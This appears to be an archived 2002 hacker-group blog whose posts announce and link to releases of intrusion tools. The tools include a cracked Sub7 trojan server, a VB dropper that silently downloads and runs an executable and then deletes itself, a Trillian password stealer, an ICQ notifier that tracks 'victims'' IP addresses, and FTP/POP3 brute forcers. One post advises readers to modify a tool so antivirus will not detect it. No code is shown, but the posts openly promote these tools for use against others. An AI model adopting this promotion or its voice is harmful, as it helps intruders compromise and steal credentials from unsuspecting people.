Internet Tools

by admin

Wednesday, July 17th, 2002 at 12:00 am

Posted by PlutonX:

Quick Update: Internet Tools 1.0 will be released later today. Worked on it all day yesterday and in version 2 (If I get enough replys for 2) I’ll add the other tools I’ve been working on. That’s all for now. PeeZ ~PluTonX~

Internet Tools 1.0

by admin

Wednesday, July 17th, 2002 at 12:00 am

Posted by PlutonX:
Well Internet Tools 1.0 = Failed. I had a power outage and lost my entire HD. But I saved about half the source code to Internet Tools.
It will be released later then soon.
Features Internet Tools had:
It’s own Chat program (Talk 1 on 1 with another)
A port scanner (Very fast) —Port Listener—
Anonymouse E-Mailer (Simple) and (Advanced) modes.
HTML Tools: View Source code (Without being on the page)
Resolve host IP
Custom Backgrounds: From a friend (James K. Polk)
Ping Whois
Brute Force with Proxy Compatibility
Brute Force included- FTP/POP3
Game BF: MIR (Wokring on it)
Proxy Scanner- Included SMTP Scan as well as
IRC Proxy Scanner.
That’s all I had on it. Uhmmm I’ll probably be working on it again starting monday (Gotta work) Drop me a message if you want me to add or remove something. That’s all for now Sorry for the inconvience

stans sub7 crack

by admin

Wednesday, May 29th, 2002 at 12:00 am

oh you didnt know??? thats right stan the man worked his magical powers to make sub7 work on nt/xp and he was so awesome to release the server to my site 🙂 even though mad fuckers are gonna download it and upload it to there’s let it be known i had the first copy 😛 , fuck i only got 6 hours left til i turn my self into the feds.. so figure i give this eeryone as a going away present … well enough with the babbling and let the downloading begin 🙂 you can find the server in the releases section…


by admin

Monday, May 20th, 2002 at 12:00 am

sup sup back again with another program release for all the little vb coders out there making trojans etc… its called ill-eagle dl 1.0 basically its a webdler for vb exes… it first checks to see if the Msvbvm60.dll is present in the system directory if not it dls it from url and then dls the exe and executes it.. if the dll is there is just dls the exe..also melts itself after its done.. its perfect because alls you need to do is send the server and not have to worry about the person having the runtime Msvbvm60.dll that is neccesary to run VB apps… get it in the releases section have fun 🙂 ::DOWNLOAD::

PassRape 1.0

by admin

Monday, May 6th, 2002 at 12:00 am

added a simple 11kb ****** password unmasker i made in ASM, works on win98 i havent tested on other os get it here ~~> Passrape 1.0 or go to the release section


by admin

Monday, May 6th, 2002 at 12:00 am

ok finaly got around to fixing my icq notifier… fixed the crashing bugs from version .0 … also added a feature for dialup victims… if the user changes ips then it will renotify you of their new ip 🙂 you can get a copy or it in the releases section or click :::HERE:::

illicq 3.1

by admin

Saturday, May 4th, 2002 at 12:00 am

finished working on illicq 3.1 fixes a memory leak in it that made the server crash if it didnt detect an internet connection … hopefully today or tommorow ill put a newer copy up… im going to party my ass off in the city this weekend in anticipation of my pending court shit .. im out

trillian rape

by admin

Monday, April 29th, 2002 at 12:00 am

finished a beta version of my trillian rape password stealer download it ::::HERE:::

by admin

Thursday, April 25th, 2002 at 12:00 am #illmob

AnalFTP Release

by admin

Tuesday, March 5th, 2002 at 12:00 am

just uploaded stans new ftp server only 13kb!!! its open source so if you know asm you can make this shit undetected on your own if it ever gets detected by avs get it in the releases section or click :::AnalFTP::: w00t!!

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